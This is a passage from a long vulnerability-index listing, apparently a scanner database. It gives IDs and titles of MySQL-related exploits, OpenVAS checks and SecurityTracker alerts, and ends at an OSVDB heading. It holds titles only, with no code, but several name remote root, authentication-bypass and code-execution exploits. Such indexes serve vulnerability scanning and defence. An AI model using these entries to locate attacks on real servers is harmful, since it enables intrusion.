20356| [29569] MySQLNewsEngine Affichearticles.PHP3 Remote File Include Vulnerability
20357| [28783] MySQLDumper 1.21 SQL.PHP Cross-Site Scripting Vulnerability
20358| [28398] MySQL 4/5 SUID Routine Miscalculation Arbitrary DML Statement Execution
20359| [28308] Banex PHP MySQL Banner Exchange 2.21 members.php cfg_root Parameter Remote File Inclusion
20360| [28307] Banex PHP MySQL Banner Exchange 2.21 admin.php Multiple Parameter SQL Injection
20361| [28306] Banex PHP MySQL Banner Exchange 2.21 signup.php site_name Parameter SQL Injection
20362| [28234] MySQL 4.x/5.x Server Date_Format Denial of Service Vulnerability
20363| [28026] MySQL Server 4/5 Str_To_Date Remote Denial of Service Vulnerability
20364| [27464] Cholod MySQL Based Message Board Mb.CGI SQL Injection Vulnerability
20365| [27444] Woltlab Burning Board 2.3.4 Class_DB_MySQL.PHP Cross-Site Scripting Vulnerability
20366| [27326] MySQL 5.0.18 Query Logging Bypass Vulnerability
20367| [26058] MySQL AB Eventum 1.x get_jsrs_data.php F Parameter XSS
20368| [26057] MySQL AB Eventum 1.x list.php release Parameter XSS
20369| [26056] MySQL AB Eventum 1.x view.php id Parameter XSS
20370| [25211] MySQL 4.x CREATE TEMPORARY TABLE Symlink Privilege Escalation
20371| [25210] MySQL 4.x CREATE FUNCTION mysql.func Table Arbitrary Library Injection
20372| [25209] MySQL 4.x CREATE FUNCTION Arbitrary libc Code Execution
20373| [24805] MySQL MaxDB 7.5 WAHTTP Server Remote Denial of Service Vulnerability
20374| [24669] MySQL 3.x/4.x ALTER TABLE/RENAME Forces Old Permission Checks
20375| [24250] MySQL 4.1/5.0 Authentication Bypass Vulnerability
20376| [23179] Oracle MySQL for Microsoft Windows MOF Execution
20377| [23138] MySQL 3.23.x/4.0.x Password Handler Buffer Overflow Vulnerability
20378| [23083] MySQL Windows Remote System Level Exploit (Stuxnet technique) 0day
20379| [23081] MySQL Remote Preauth User Enumeration Zeroday
20380| [23078] MySQL Denial of Service Zeroday PoC
20381| [23077] MySQL (Linux) Database Privilege Elevation Zeroday Exploit
20382| [23076] MySQL (Linux) Heap Based Overrun PoC Zeroday
20383| [23075] MySQL (Linux) Stack Based Buffer Overrun PoC Zeroday
20384| [23073] MySQL 5.1/5.5 WiNDOWS REMOTE R00T (mysqljackpot)
20385| [22946] MySQL AB ODBC Driver 3.51 Plain Text Password Vulnerability
20386| [22565] MySQL 3.x/4.0.x Weak Password Encryption Vulnerability
20387| [22340] MySQL 3.23.x mysqld Privilege Escalation Vulnerability
20388| [22085] MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Memory Corruption Vulnerability
20389| [22084] MySQL 3.23.x/4.0.x COM_CHANGE_USER Password Length Account Compromise Vulnerability
20390| [21726] MySQL 3.20.32/3.22.x/3.23.x Null Root Password Weak Default Configuration Vulnerability (2)
20391| [21725] MySQL 3.20.32/3.22.x/3.23.x Null Root Password Weak Default Configuration Vulnerability (1)
20392| [21266] PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (3)
20393| [21265] PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (2)
20394| [21264] PHP 4.x/5.x MySQL Safe_Mode Filesystem Circumvention Vulnerability (1)
20395| [20718] MySQL 3.20.32 a/3.23.34 Root Operation Symbolic Link File Overwriting Vulnerability
20396| [20581] Mysql 3.22.x/3.23.x Local Buffer Overflow Vulnerability
20397| [20355] Plixer Scrutinizer NetFlow and sFlow Analyzer 9 Default MySQL Credential
20398| [20055] MySQL Squid Access Report 2.1.4 HTML Injection
20399| [20044] Symantec Web Gateway 5.0.3.18 Blind SQLi Backdoor via MySQL Triggers
20400| [19721] MySQL 3.22.27/3.22.29/3.23.8 GRANT Global Password Changing Vulnerability
20401| [19092] MySQL Remote Root Authentication Bypass
20402| [18269] MySQL 5.5.8 - Remote Denial of Service (DOS)
20403| [16957] Oracle MySQL for Microsoft Windows Payload Execution
20404| [16850] MySQL yaSSL CertDecoder::GetName Buffer Overflow
20405| [16849] MySQL yaSSL SSL Hello Message Buffer Overflow
20406| [16701] MySQL yaSSL SSL Hello Message Buffer Overflow
20407| [15467] Oracle MySQL < 5.1.49 'WITH ROLLUP' Denial of Service Vulnerability
20408| [14654] CMSQLite <= 1.2 & CMySQLite <= 1.3.1 - Remote Code Execution Exploit
20409| [14537] Oracle MySQL 'ALTER DATABASE' Remote Denial of Service Vulnerability
20410| [14096] CMSQlite & CMySQLite CSRF Vulnerability
20411| [10876] PHP-MySQL-Quiz SQL Injection Vulnerability
20412| [10450] Linkster PHP/MySQL SQL Injection Vulnerability
20413| [10260] Robert Zimmerman PHP / MYSQL Scripts Admin Bypass
20414| [9953] MySQL <= 6.0 yaSSL <= 1.7.5 Hello Message Buffer Overflow
20415| [9085] MySQL <= 5.0.45 COM_CREATE_DB Format String PoC (auth)
20416| [8037] ProFTPd with mod_mysql Authentication Bypass Vulnerability
20417| [7856] MySQL 4/5/6 UDF for Command Execution
20418| [7020] MySQL Quick Admin 1.5.5 - Local File Inclusion Vulnerability
20419| [6641] MySQL Quick Admin <= 1.5.5 (COOKIE) Local File Inclusion Vulnerability
20420| [6577] PromoteWeb MySQL (go.php id) Remote SQL Injection Vulnerability
20421| [6136] phpWebNews 0.2 MySQL Edition (SQL) Insecure Cookie Handling Vuln
20422| [5999] phpWebNews 0.2 MySQL Edition (det) SQL Injection Vulnerability
20423| [5998] phpWebNews 0.2 MySQL Edition (id_kat) SQL Injection Vulnerability
20424| [5913] MyBlog: PHP and MySQL Blog/CMS software (SQL/XSS) Vulnerabilities
20425| [4615] MySQL <= 5.0.45 (Alter) Denial of Service Vulnerability
20426| [4392] PHP <= 4.4.7 / 5.2.3 MySQL/MySQLi Safe Mode Bypass Vulnerability
20427| [3685] MyBlog: PHP and MySQL Blog/CMS software RFI Vulnerability
20428| [3591] PHP-Nuke Module Eve-Nuke 0.1 (mysql.php) RFI Vulnerability
20429| [3468] MySQL Commander <= 2.7 (home) Remote File Inclusion Vulnerability
20430| [3450] NukeSentinel <= 2.5.06 (MySQL => 4.0.24) - Remote SQL Injection Exploit
20431| [3344] PHP-Nuke <= 8.0 Final (INSERT) Blind SQL Injection Exploit (mysql)
20432| [3274] MySQL 4.x/5.0 User-Defined Function Command Execution Exploit (win)
20433| [2969] Php/Mysql Site Builder 0.0.2 (htm2php.php) File Disclosure Vulnerability
20434| [2726] Agora 1.4 RC1 (MysqlfinderAdmin.php) Remote File Include Vulnerability
20435| [2554] cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit (php)
20436| [2466] cPanel <= 10.8.x (cpwrap via mysqladmin) Local Root Exploit
20437| [2437] paBugs <= 2.0 Beta 3 (class.mysql.php) Remote File Include Exploit
20438| [2420] ZoomStats <= 1.0.2 (mysql.php) Remote File Include Vulnerability
20439| [1742] MySQL (<= 4.1.18, 5.0.20) Local/Remote Information Leakage Exploit
20440| [1741] MySQL <= 5.0.20 COM_TABLE_DUMP Memory Leak/Remote BoF Exploit
20441| [1518] MySQL 4.x/5.0 User-Defined Function Local Privilege Escalation Exploit
20442| [1406] PHP <= 4.4.0 (mysql_connect function) Local Buffer Overflow Exploit
20443| [1181] MySQL 4.0.17 UDF Dynamic Library Exploit
20444| [1134] MySQL Eventum <= 1.5.5 (login.php) SQL Injection Exploit
20445| [960] MySQL MaxDB Webtool <= 7.5.00.23 Remote Stack Overflow Exploit
20446| [311] MySQL 4.1/5.0 zero-length password Auth. Bypass Exploit
20447| [98] MySQL 3.23.x/4.0.x Remote Exploit
20448|
20449| OpenVAS (Nessus) - http://www.openvas.org:
20450| [902675] MySQLDumper Multiple Vulnerabilities
20451| [881549] CentOS Update for mysql CESA-2012:1551 centos6
20452| [881538] CentOS Update for mysql CESA-2012:1462 centos6
20453| [881225] CentOS Update for mysql CESA-2012:0105 centos6
20454| [881185] CentOS Update for mysql CESA-2012:0127 centos5
20455| [881061] CentOS Update for mysql CESA-2012:0874 centos6
20456| [880760] CentOS Update for mysql CESA-2009:1289 centos5 i386
20457| [880613] CentOS Update for mysql CESA-2010:0109 centos5 i386
20458| [880577] CentOS Update for mysql CESA-2010:0442 centos5 i386
20459| [880452] CentOS Update for mysql CESA-2010:0824 centos4 i386
20460| [880366] CentOS Update for mysql CESA-2010:0110 centos4 i386
20461| [880329] CentOS Update for mysql CESA-2007:1155 centos4 x86_64
20462| [880324] CentOS Update for mysql CESA-2007:1155 centos4 i386
20463| [870870] RedHat Update for mysql RHSA-2012:1551-01
20464| [870861] RedHat Update for mysql RHSA-2012:1462-01
20465| [870778] RedHat Update for mysql RHSA-2012:0874-04
20466| [870736] RedHat Update for mysql RHSA-2011:0164-01
20467| [870647] RedHat Update for mysql RHSA-2012:0105-01
20468| [870547] RedHat Update for mysql RHSA-2012:0127-01
20469| [870357] RedHat Update for mysql RHSA-2010:0824-01
20470| [870356] RedHat Update for mysql RHSA-2010:0825-01
20471| [870272] RedHat Update for mysql RHSA-2010:0442-01
20472| [870218] RedHat Update for mysql RHSA-2010:0110-01
20473| [870216] RedHat Update for mysql RHSA-2010:0109-01
20474| [870195] RedHat Update for mysql RHSA-2007:1155-01
20475| [870069] RedHat Update for mysql RHSA-2008:0364-01
20476| [870033] RedHat Update for mysql RHSA-2008:0768-01
20477| [864951] Fedora Update for mysql FEDORA-2012-19823
20478| [864945] Fedora Update for mysql FEDORA-2012-19833
20479| [864504] Fedora Update for mysql FEDORA-2012-9324
20480| [864474] Fedora Update for mysql FEDORA-2012-9308
20481| [863910] Fedora Update for mysql FEDORA-2012-0972
20482| [863725] Fedora Update for mysql FEDORA-2012-0987
20483| [862844] Fedora Update for mod_auth_mysql FEDORA-2011-0100
20484| [862840] Fedora Update for mod_auth_mysql FEDORA-2011-0114
20485| [862676] Fedora Update for mysql FEDORA-2010-15147
20486| [862444] Fedora Update for mysql FEDORA-2010-15166
20487| [862300] Fedora Update for mysql FEDORA-2010-11126
20488| [862290] Fedora Update for mysql FEDORA-2010-11135
20489| [862149] Fedora Update for mysql FEDORA-2010-9053
20490| [862148] Fedora Update for mysql FEDORA-2010-9061
20491| [862136] Fedora Update for mysql FEDORA-2010-9016
20492| [861948] Fedora Update for mysql FEDORA-2010-7355
20493| [861936] Fedora Update for mysql FEDORA-2010-7414
20494| [861707] Fedora Update for mysql FEDORA-2010-1300
20495| [861651] Fedora Update for mysql FEDORA-2010-1348
20496| [861544] Fedora Update for php-pear-MDB2-Driver-mysql FEDORA-2007-3369
20497| [861392] Fedora Update for mysql FEDORA-2007-4471
20498| [861180] Fedora Update for php-pear-MDB2-Driver-mysqli FEDORA-2007-3369
20499| [861162] Fedora Update for php-pear-MDB2-Driver-mysql FEDORA-2007-3376
20500| [861108] Fedora Update for php-pear-MDB2-Driver-mysqli FEDORA-2007-3376
20501| [861033] Fedora Update for mysql FEDORA-2007-4465
20502| [855481] Solaris Update for mysql 120292-02
20503| [855333] Solaris Update for mysql 120293-02
20504| [850182] SuSE Update for mysql openSUSE-SU-2012:0860-1 (mysql)
20505| [841248] Ubuntu Update for mysql-5.5 USN-1658-1
20506| [841207] Ubuntu Update for mysql-5.5 USN-1621-1
20507| [841039] Ubuntu Update for mysql-5.5 USN-1467-1
20508| [840989] Ubuntu Update for mysql-5.1 USN-1427-1
20509| [840944] Ubuntu Update for mysql-5.1 USN-1397-1
20510| [840533] Ubuntu Update for MySQL vulnerabilities USN-1017-1
20511| [840442] Ubuntu Update for MySQL vulnerabilities USN-950-1
20512| [840384] Ubuntu Update for MySQL vulnerabilities USN-897-1
20513| [840292] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-671-1
20514| [840240] Ubuntu Update for mysql-dfsg-5.0 regression USN-588-2
20515| [840219] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-588-1
20516| [840106] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-559-1
20517| [840042] Ubuntu Update for mysql-dfsg-5.0 vulnerabilities USN-528-1
20518| [840012] Ubuntu Update for mysql-dfsg-5.0 vulnerability USN-440-1
20519| [835096] HP-UX Update for on HP 9000 Servers Running MySQL HPSBUX00287
20520| [831755] Mandriva Update for mysql MDVSA-2012:178 (mysql)
20521| [831684] Mandriva Update for mysql MDVA-2012:049 (mysql)
20522| [831547] Mandriva Update for mysql MDVA-2012:022 (mysql)
20523| [831532] Mandriva Update for mysql MDVA-2012:005 (mysql)
20524| [831519] Mandriva Update for mysql MDVA-2011:099 (mysql)
20525| [831425] Mandriva Update for mysql MDVA-2011:025 (mysql)
20526| [831327] Mandriva Update for mysql MDVA-2011:005 (mysql)
20527| [831315] Mandriva Update for mysql MDVSA-2011:012 (mysql)
20528| [831295] Mandriva Update for mysql MDVA-2010:240 (mysql)
20529| [831244] Mandriva Update for mysql MDVSA-2010:155-1 (mysql)
20530| [831243] Mandriva Update for mysql MDVSA-2010:222 (mysql)
20531| [831237] Mandriva Update for mysql MDVSA-2010:223 (mysql)
20532| [831202] Mandriva Update for mysql MDVA-2010:210 (mysql)
20533| [831134] Mandriva Update for mysql MDVSA-2010:155 (mysql)
20534| [831049] Mandriva Update for mysql MDVSA-2010:107 (mysql)
20535| [831048] Mandriva Update for mysql MDVSA-2010:101 (mysql)
20536| [831034] Mandriva Update for mysql MDVA-2010:146 (mysql)
20537| [831033] Mandriva Update for mysql MDVSA-2010:093 (mysql)
20538| [830902] Mandriva Update for mysql MDVSA-2010:044 (mysql)
20539| [830821] Mandriva Update for mysql MDVSA-2010:011 (mysql)
20540| [830806] Mandriva Update for mysql MDVSA-2010:012 (mysql)
20541| [830772] Mandriva Update for mysql MDVSA-2008:150 (mysql)
20542| [830664] Mandriva Update for mysql MDVA-2008:018 (mysql)
20543| [830659] Mandriva Update for mysql MDVSA-2008:017 (mysql)
20544| [830513] Mandriva Update for mysql MDVSA-2008:028 (mysql)
20545| [830421] Mandriva Update for mysql MDVSA-2008:149 (mysql)
20546| [830297] Mandriva Update for MySQL MDKSA-2007:177 (MySQL)
20547| [830223] Mandriva Update for perl-DBD-mysql MDKA-2007:066 (perl-DBD-mysql)
20548| [830063] Mandriva Update for MySQL MDKSA-2007:139 (MySQL)
20549| [830032] Mandriva Update for MySQL MDKSA-2007:243 (MySQL)
20550| [801593] Oracle MySQL Eventum Multiple Cross Site Scripting Vulnerabilities
20551| [801205] MySQL Connector/Net SSL Certificate Validation Security Bypass Vulnerability
20552| [103051] PHP MySQLi Extension 'set_magic_quotes_runtime' Function Security-Bypass Weakness
20553| [100662] PHP Mysqlnd Extension Information Disclosure and Multiple Buffer Overflow Vulnerabilities
20554| [71475] Debian Security Advisory DSA 2496-1 (mysql-5.1)
20555| [71233] Debian Security Advisory DSA 2429-1 (mysql-5.1)
20556| [70803] Gentoo Security Advisory GLSA 201201-02 (MySQL)
20557| [70586] FreeBSD Ports: proftpd, proftpd-mysql
20558| [67541] Debian Security Advisory DSA 2057-1 (mysql-dfsg-5.0)
20559| [66577] Fedora Core 11 FEDORA-2009-13504 (mysql)
20560| [66573] Fedora Core 12 FEDORA-2009-13466 (mysql)
20561| [66553] Mandriva Security Advisory MDVSA-2009:189-1 (apache-mod_auth_mysql)
20562| [66508] Fedora Core 10 FEDORA-2009-12180 (mysql)
20563| [66425] Mandriva Security Advisory MDVSA-2009:326 (mysql)
20564| [66256] Fedora Core 11 FEDORA-2009-10701 (ocaml-mysql)
20565| [66251] Fedora Core 10 FEDORA-2009-10582 (ocaml-mysql)
20566| [66056] Debian Security Advisory DSA 1910-1 (mysql-ocaml)
20567| [66035] Mandrake Security Advisory MDVSA-2009:279 (ocaml-mysql)
20568| [65937] SLES10: Security update for MySQL
20569| [65884] SLES10: Security update for MySQL
20570| [65827] SLES10: Security update for MySQL
20571| [65710] SLES11: Security update for MySQL
20572| [65610] SLES9: Security update for MySQL
20573| [65566] SLES9: Security update for MySQL
20574| [65507] SLES9: Security update for MySQL
20575| [65502] SLES9: Security update for mysql
20576| [65426] SLES9: Security update for MySQL
20577| [65385] SLES9: Security update for mysql
20578| [65341] SLES9: Security update for MySQL
20579| [65181] SLES9: Security update for MySQL
20580| [65176] SLES9: Security update for MySQL
20581| [64932] CentOS Security Advisory CESA-2009:1289 (mysql)
20582| [64820] Debian Security Advisory DSA 1877-1 (mysql-dfsg-5.0)
20583| [64532] Mandrake Security Advisory MDVSA-2009:189 (apache-mod_auth_mysql)
20584| [64522] Mandrake Security Advisory MDVSA-2009:179 (mysql)
20585| [64461] Mandrake Security Advisory MDVSA-2009:159 (mysql)
20586| [63872] Mandrake Security Advisory MDVSA-2009:094 (mysql)
20587| [63630] FreeBSD Ports: proftpd, proftpd-mysql
20588| [63171] FreeBSD Ports: mysql-server
20589| [63170] FreeBSD Ports: mysql-server
20590| [63169] FreeBSD Ports: mysql-server
20591| [63168] FreeBSD Ports: mysql-server
20592| [63095] FreeBSD Ports: mysql-server
20593| [61852] Debian Security Advisory DSA 1662-1 (mysql-dfsg-5.0)
20594| [61699] FreeBSD Ports: mysql-client
20595| [61656] FreeBSD Ports: proftpd, proftpd-mysql
20596| [61618] FreeBSD Ports: mysql-server
20597| [61599] Gentoo Security Advisory GLSA 200809-04 (mysql)
20598| [61283] Debian Security Advisory DSA 1608-1 (mysql-dfsg-5.0)
20599| [60804] Gentoo Security Advisory GLSA 200804-04 (mysql)
20600| [60271] Debian Security Advisory DSA 1478-1 (mysql-dfsg-5.0)
20601| [60106] Debian Security Advisory DSA 1451-1 (mysql-dfsg-5.0)
20602| [60017] Slackware Advisory SSA:2007-348-01 mysql
20603| [59638] Debian Security Advisory DSA 1413-1 (mysql-dfsg, mysql-dfsg-5.0, mysql-dfsg-4.1)
20604| [59245] Gentoo Security Advisory GLSA 200711-25 (mysql)
20605| [58863] FreeBSD Ports: freeradius, freeradius-mysql
20606| [58545] Gentoo Security Advisory GLSA 200708-10 (mysql)
20607| [58261] Gentoo Security Advisory GLSA 200705-11 (MySQL)
20608| [57859] Gentoo Security Advisory GLSA 200608-09 (mysql)
20609| [57725] FreeBSD Ports: proftpd, proftpd-mysql
20610| [57576] FreeBSD Ports: proftpd, proftpd-mysql
20611| [57527] FreeBSD Ports: mysql-server
20612| [57526] FreeBSD Ports: mysql-server
20613| [57337] Debian Security Advisory DSA 1169-1 (mysql-dfsg-4.1)
20614| [57257] FreeBSD Ports: mysql-server
20615| [57167] Slackware Advisory SSA:2006-211-01 mysql
20616| [57109] Debian Security Advisory DSA 1112-1 (mysql-dfsg-4.1)
20617| [56964] Gentoo Security Advisory GLSA 200606-18 (pam_mysql)
20618| [56940] Gentoo Security Advisory GLSA 200606-13 (MySQL)
20619| [56924] Debian Security Advisory DSA 1092-1 (mysql-dfsg-4.1)
20620| [56861] Slackware Advisory SSA:2006-155-01 mysql
20621| [56850] FreeBSD Ports: mysql-server
20622| [56849] FreeBSD Ports: mysql-server
20623| [56833] Debian Security Advisory DSA 1079-1 (mysql-dfsg)
20624| [56789] Debian Security Advisory DSA 1073-1 (mysql-dfsg-4.1)
20625| [56788] Debian Security Advisory DSA 1071-1 (mysql)
20626| [56730] Slackware Advisory SSA:2006-129-02 mysql
20627| [56728] Gentoo Security Advisory GLSA 200605-13 (MySQL)
20628| [56714] FreeBSD Ports: mysql-server
20629| [55520] Debian Security Advisory DSA 833-2 (mysql-dfsg-4.1)
20630| [55514] Debian Security Advisory DSA 833-1 (mysql-dfsg-4.1)
20631| [55493] Debian Security Advisory DSA 829-1 (mysql)
20632| [55492] Debian Security Advisory DSA 831-1 (mysql-dfsg)
20633| [55164] Debian Security Advisory DSA 783-1 (mysql-dfsg-4.1)
20634| [54884] Gentoo Security Advisory GLSA 200503-19 (mysql)
20635| [54819] Gentoo Security Advisory GLSA 200501-33 (mysql)
20636| [54713] Gentoo Security Advisory GLSA 200410-22 (MySQL)
20637| [54659] Gentoo Security Advisory GLSA 200409-02 (MySQL)
20638| [54580] Gentoo Security Advisory GLSA 200405-20 (MySQL)
20639| [54483] FreeBSD Ports: proftpd, proftpd-mysql
20640| [54201] FreeBSD Ports: mysql-server
20641| [53776] Debian Security Advisory DSA 013-1 (mysql)
20642| [53755] Debian Security Advisory DSA 483-1 (mysql)
20643| [53750] Debian Security Advisory DSA 707-1 (mysql)
20644| [53666] Debian Security Advisory DSA 381-1 (mysql)
20645| [53595] Debian Security Advisory DSA 303-1 (mysql)
20646| [53585] Debian Security Advisory DSA 212-1 (mysql)
20647| [53481] Debian Security Advisory DSA 647-1 (mysql)
20648| [53251] Debian Security Advisory DSA 562-1 (mysql)
20649| [53230] Debian Security Advisory DSA 540-1 (mysql)
20650| [52466] FreeBSD Ports: exim, exim-ldap2, exim-mysql, exim-postgresql
20651| [52459] FreeBSD Ports: mysql-client
20652| [52419] FreeBSD Ports: mysql-scripts
20653| [52406] FreeBSD Ports: mysql-server
20654| [52375] FreeBSD Ports: mysql-server, mysql-client
20655| [52274] FreeBSD Ports: mysql-server
20656| [52273] FreeBSD Ports: mysql-server
20657| [52272] FreeBSD Ports: mysql-server
20658| [52271] FreeBSD Ports: mysql-server
20659| [52270] FreeBSD Ports: mysql-server
20660| [52233] FreeBSD Ports: mysql-scripts
20661| [52158] FreeBSD Ports: mysql-server
20662| [16093] MySQL Eventum Multiple flaws
20663| [12639] MySQL Authentication bypass through a zero-length password
20664| [10783] PCCS-Mysql User/Password Exposure
20665|
20666| SecurityTracker - https://www.securitytracker.com:
20667| [1028790] MySQL Multiple Bugs Let Remote Users Deny Service and Partially Access and Modify Data
20668| [1028449] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service and Partially Access and Modify Data
20669| [1028004] MySQL Multiple Bugs Let Remote Authenticated Users Take Full Control or Deny Service and Let Local Users Access and Modify Data
20670| [1027829] MySQL Bug in UpdateXML() Lets Remote Authenticated Users Deny Service
20671| [1027828] MySQL Heap Overflow May Let Remote Authenticated Users Execute Arbitrary Code
20672| [1027827] MySQL Stack Overflow May Let Remote Authenticated Users Execute Arbitrary Code
20673| [1027665] MySQL Multiple Bugs Let Remote Authenticated Users Access and Modify Data and Deny Service and Local Users Access Data
20674| [1027263] MySQL Multiple Bugs Let Remote Authenticated Users Deny Service
20675| [1027143] MySQL memcmp() Comparison Error Lets Remote Users Bypass Authentication
20676| [1026934] MySQL Multiple Bugs Let Remote Users Deny Service
20677| [1026896] MySQL Unspecified Flaws Have Unspecified Impact
20678| [1026659] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
20679| [1026530] MySQL Multiple Bugs Let Local and Remote Users Partially Access and Modifiy Data and Partially Deny Service
20680| [1024508] MySQL Replication Flaw Lets Remote Authenticated Users Gain Elevated Privileges
20681| [1024507] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
20682| [1024360] MySQL Multiple Flaws Let Remote Authenticated Users Deny Service
20683| [1024160] MySQL ALTER DATABASE Processing Error Lets Remote Authenticated Users Deny Service
20684| [1024033] MySQL COM_FIELD_LIST Packet Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code
20685| [1024032] MySQL Large Packet Processing Flaw in my_net_skip_rest() Lets Remote Users Deny Service
20686| [1024031] MySQL COM_FIELD_LIST Validation Flaw Lets Remote Authenticated Users Gain Elevated Privileges
20687| [1024004] MySQL mi_delete_table() Symlink Flaw Lets Remote Authenticated Users Delete Data and Index Files
20688| [1023402] MySQL Unspecified Flaw Lets Remote Users Execute Arbitrary Code
20689| [1023220] MySQL Client Fails to Check Server Certificates in Certain Cases
20690| [1022812] MySQL Unspecified Buffer Overflow Lets Remote Users Execute Arbitrary Code
20691| [1022533] MySQL Format String Bug in dispatch_command() Lets Remote Users Deny Service
20692| [1022482] MySQL Connector/Net is Missing SSL Certificate Validation
20693| [1021786] MySQL Bug in ExtractValue()/UpdateXML() in Processing XPath Expressions Lets Remote Authenticated Users Deny Service
20694| [1021714] (Red Hat Issues Fix) mod_auth_mysql Input Validation Flaw Lets Remote Users Inject SQL Commands
20695| [1020858] MySQL Item_bin_string::Item_bin_string() Binary Value Processing Bug Lets Remote Authenticated Users Deny Service
20696| [1019995] MySQL MyISAM Options Let Local Users Overwrite Table Files
20697| [1019085] MySQL Bugs Let Remote Authenticated Users Gain Elevated Privileges and Deny Service
20698| [1019084] MySQL DATA DIRECTORY and INDEX DIRECTORY Options May Let Remote Authenticated Users Gain Elevated Privileges
20699| [1019083] MySQL BINLOG Filename Path Bug May Let Remote Authenticated Users Gain Elevated Privileges
20700| [1019060] MySQL Rename Table Bug Lets Remote Authenticated Users Modify System Table Information
20701| [1018978] MySQL convert_search_mode_to_innobase() Bug Lets Remote Authenticated Users Deny Service
20702| [1018824] Asterisk-Addons Input Validation Flaw in cdr_addon_mysql Lets Remote Users Inject SQL Commands
20703| [1018663] MySQL Table View Access Bug Lets Remote Authenticated Users Gain Elevated Privileges
20704| [1018629] MySQL Authentication Protocol Bug Lets Remote Users Deny Service
20705| [1018071] MySQL ALTER TABLE Function Lets Remote Authenticated Users Obtain Potentially Sensitive Information
20706| [1018070] MySQL SQL SECURITY INVOKER Routines Let Remote Authenticated Users Gain Elevated Privileges
20707| [1018069] MySQL Lets Remote Authenticated Users Issue the RENAME TABLE Command
20708| [1017746] MySQL Single Row Subselect Statements Let Remote Users Deny Service
20709| [1016790] MySQL Replication Error Lets Local Users Deny Service
20710| [1016710] MySQL Case-Sensitive Database Names May Let Users Access Restricted Databases
20711| [1016709] MySQL Error in Checking suid Routine Arguments May Let Users Gain Elevated Privileges
20712| [1016617] MySQL MERGE Access Control Error May Let Users Access a Restricted Table
20713| [1016566] Opsware Network Automation System Discloses MySQL Password to Local Users
20714| [1016216] MySQL Error in Parsing Multibyte Encoded Data in mysql_real_escape() Lets Remote Users Inject SQL Commands
20715| [1016077] Apple MySQL Manager Database Initialization Bug May Let Local Users Access the Database
20716| [1016017] MySQL Anonymous Login Processing May Disclose Some Memory Contents to Remote Users
20717| [1016016] MySQL COM_TABLE_DUMP Processing Lets Remote Authenticated Users Execute Arbitrary Code or Obtain Information
20718| [1015789] Woltlab Burning Board Input Validation Hole in 'class_db_mysql.php' Permits Cross-Site Scripting Attacks
20719| [1015693] MySQL Query Bug Lets Remote Users Bypass Query Logging
20720| [1015603] PAM-MySQL pam_get_item() Double Free May Let Remote Users Execute Arbitrary Code
20721| [1015485] PHP mysqli Extension Error Mode Format String Flaw May Let Users Execute Arbitrary Code
20722| [1014603] MySQL Eventum Input Validation Hole in 'class.auth.php' Permits SQL Injection and Other Input Validation Bugs Permit Cross-Site Scripting Attacks
20723| [1014172] xMySQLadmin Lets Local Users Delete Files
20724| [1013995] MySQL 'mysql_install_db' Uses Unsafe Temporary Files and May Let Local Users Gain Elevated Privilege
20725| [1013994] MySQL Non-existent '--user' Error May Allow the Database to Run With Incorrect Privileges
20726| [1013415] MySQL CREATE FUNCTION Lets Authenticated Users Invoke libc Functions to Execute Arbitrary Code
20727| [1013414] MySQL udf_init() Path Validation Flaw Lets Authenticated Users Execute Arbitrary Libraries
20728| [1013413] MySQL CREATE TEMPORARY TABLE Uses Predictable Temporary Files That May Let Users Gain Elevated Privileges
20729| [1012914] MySQL 'mysqlaccess.sh' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
20730| [1012893] MySQL MaxDB Buffer Overflow in websql Password Parameter Lets Remote Users Execute Arbitrary Code
20731| [1012500] mysql_auth Memory Leak Has Unspecified Impact
20732| [1011741] MySQL Access Control Error in Databases With Underscore Wildcard Character May Grant Unauthorized Access
20733| [1011606] MySQL May Let Remote Authenticated Users Access Restricted Tables or Crash the System
20734| [1011408] MySQL libmysqlclient Buffer Overflow in Executing Prepared Statements Has Unspecified Impact
20735| [1011376] MySQLGuest Lack of Input Validation Lets Remote Users Conduct Cross-Site Scripting Attacks
20736| [1011008] MySQL Buffer Overflow in mysql_real_connect() May Let Remote Users Execute Arbitrary Code
20737| [1010979] MySQL 'mysqlhotcopy' Unsafe Temporary Files May Let Local Users Gain Elevated Privileges
20738| [1010645] MySQL check_scramble_323() Zero-Length Comparison Lets Remote Users Bypass Authentication
20739| [1009784] MySQL 'mysqld_multi' Temporary File Flaw Lets Local Users Overwrite Files
20740| [1009554] MySQL 'mysqlbug' Temporary File Flaw Lets Local Users Overwrite Files
20741| [1007979] MySQL mysql_change_user() Double Free Error Lets Remote Authenticated Users Crash mysqld
20742| [1007673] MySQL acl_init() Buffer Overflow Permits Remote Authenticated Administrators to Execute Arbitrary Code
20743| [1007518] DWebPro Discloses MySQL Database Password to Local Users
20744| [1007312] MySQL World-Writable Configuration File May Let Local Users Gain Root Privileges
20745| [1006976] MySQL Buffer Overflow in 'mysql_real_connect()' Client Function May Let Remote or Local Users Execute Arbitrary Code
20746| [1005800] MySQL Overflow and Authentication Bugs May Let Remote Users Execute Code or Access Database Accounts
20747| [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT
20748| [1004506] vBulletin PHP-based Forum Software Has Unspecified Security Flaw in the 'db_mysql.php' Module
20749| [1004172] PHP-Survey Script Discloses Underlying MySQL Database Username and Password to Remote Users
20750| [1003955] 3rd Party Patch for Cyrus SASL ('auxprop for mysql and ldap') Lets Remote Users Access Protected POP Mail Accounts Without Authentication
20751| [1003290] Conectiva Linux MySQL Distribution May Allow Local Users to Obtain Sensitive Information
20752| [1002993] PurePostPro Script Add-on for PureFTPd and MySQL Allows Remote Users to Execute SQL Commands on the Server
20753| [1002485] WinMySQLadmin Database Administration Tool Discloses MySQL Password to Local Users
20754| [1002324] Vpopmail Mail Server Discloses Database Password to Local Users When Installed with MySQL
20755| [1001411] phpMyAdmin Administration Tool for MySQL Allows Remote Users to Execute Commands on the Server
20756| [1001118] MySQL Database Allows Authorized Users to Modify Server Files to Deny Service or Obtain Additional Access
20757|
20758| OSVDB - http://www.osvdb.org:
